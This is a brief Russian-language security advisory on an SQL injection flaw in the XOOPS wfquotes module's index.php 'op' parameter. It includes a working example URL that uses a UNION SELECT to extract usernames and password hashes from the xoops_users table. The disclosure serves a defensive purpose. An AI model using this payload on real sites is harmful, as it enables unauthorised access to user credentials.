Программа: XOOPS Module wfquotes 1.0 0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «op» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

/modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/*
*/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии